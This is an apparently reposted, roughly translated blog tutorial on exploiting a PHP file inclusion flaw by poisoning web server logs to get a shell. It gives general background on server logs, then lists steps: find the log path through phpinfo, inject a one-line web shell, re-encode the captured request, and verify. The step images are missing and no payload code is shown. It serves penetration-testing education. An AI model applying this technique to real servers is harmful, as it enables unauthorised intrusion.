[Network Security] File contains vulnerability--poisoning getshell through logs

 Blogger Nickname: Jumping Stairs Penguin
Blogger Home Page Link: Blogger Home Portal

Blogger's column page link: Column Portal -- Network Security Technology
Creation Original Intention: The original intention of this blog is to communicate with technical friends. Everyone's technology has shortcomings, and the same is true for bloggers. Ask for advice with an humility. Friends give guidance.
The blogger's motto: discover the light, follow the light, become the light, and emit the light;
the blogger's research direction: penetration testing, machine learning;
the blogger's message: Thank you for your support, your support is the driving force for me to move forward;

 

1. The file contains vulnerabilities

It has been explained before, if you want to know more, you can click the link and click to jump
 

Second, the role of the log

(1) What is the website log

A server log is one or more log files automatically created and maintained by a server that contain a list of the activities it performs.

A typical example of a server log is the log of a web server, which contains a history of page requests. The W3C maintains a standard format for web server log files, the Common Log Format, but other proprietary formats exist. Log files in recent years often append their contents to the end of the file. Added information about the request, including client IP address , request date / time , web page requested , HTTP code, bytes provided, user agent , referrer, etc. This data may be written in a file, or it may be separated into different logs, such as access logs, error logs, referrer logs, etc. However, server logs typically do not collect user-specific information.

 (2) The role of the log

1. Website logs and website analysis have mutual value and significance. By analyzing website logs, we can know where website visitors come from? What are website visitors looking for? Which page is the most popular? Where do website visitors leave? Website administrators, operators, and promoters can grasp the website traffic information in real time based on these data information, and understand the specific behavior of users and analyze the purpose of users. Thereby optimizing the website, improving the user experience of the website, increasing the website traffic, allowing more visitors to settle down and become members or customers, and maximize the income through less investment.

2. The website log records the operation information of the website in detail, so if the website is slightly abnormal, you can analyze the details of the errors occurred during the operation of the website through the website log, such as error pages, error codes and other information, so that you can check and fill the gaps. Make up for the mistakes encountered in the operation of the website, and eliminate and solve other problems encountered in the operation. For example: find 404 pages and try to restore website access; find other pages with problems, including dead links, the return code is abnormal, it is necessary to deal with them to restore normal access to the page, and dead links that cannot be restored to normal access , create a txt document and submit it to Baidu webmaster platform.

3. The website log also records the details of the search engine spiders crawling the website, and uses this to analyze the intent of the search engine spiders, so as to make the optimization of the website more intuitive and traceable, and to make decisions that are beneficial to search engines. Optimized adjustments. For example, it is found that Baidu spiders visit the website at a fixed time every day, then you can choose to update the website content within this fixed time.

3. Begin to reproduce

(1) We query the absolute path of the log through phpinfo

  

 (2) View the code according to the path

  

 (3) Any access, record the log when viewing

  

(4) Open the log

  

found that it was actually stored

 (5) Use the URL to enter the directory

  

 (6) Write one sentence Trojan horse

  

(7) You need to capture the packet and change the code to continue writing

  

 (8) Verification

  

(9) View the effect

 

This is because of the encoding problem, so it is very messy to see, but you can see that there is an ip

reproduced

 

おすすめ

転載: blog.csdn.net/weixin_50481708/article/details/126653329